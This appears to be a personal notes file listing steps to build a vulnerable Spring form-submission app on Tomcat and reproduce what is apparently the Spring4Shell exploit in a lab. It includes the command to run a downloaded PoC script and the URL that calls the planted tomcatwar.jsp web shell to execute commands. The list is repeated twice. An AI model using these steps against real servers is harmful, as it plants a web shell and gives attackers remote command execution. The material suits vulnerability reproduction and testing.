dogeared/stuff.txt

## stuff.txt
- clone https://spring.io/guides/gs/handling-form-submission/
- you can skip right to gs-handling-form-submission/complete, no need to follow the tutorial
- modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy)
- install tomcat9 + java 11 (i did it on ubuntu 20.04)
- deploy the war file
- update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT
- run PoC (ignore the URL it gives you for the webshell): python3 exp.py --url http://your.ip.here:8080/handling-form-submission-complete/greeting
- you should see the "tomcatwar.jsp" file now in webapps/handling-form-submission
- hit http://your.ip.here:8080/handling-form-submission/tomcatwar.jsp?pwd=j&cmd=id to see the results
	- clone https://spring.io/guides/gs/handling-form-submission/
	- you can skip right to gs-handling-form-submission/complete, no need to follow the tutorial
	- modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy)
	- install tomcat9 + java 11 (i did it on ubuntu 20.04)
	- deploy the war file
	- update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT
	- run PoC (ignore the URL it gives you for the webshell): python3 exp.py --url http://your.ip.here:8080/handling-form-submission-complete/greeting
	- you should see the "tomcatwar.jsp" file now in webapps/handling-form-submission
	- hit http://your.ip.here:8080/handling-form-submission/tomcatwar.jsp?pwd=j&cmd=id to see the results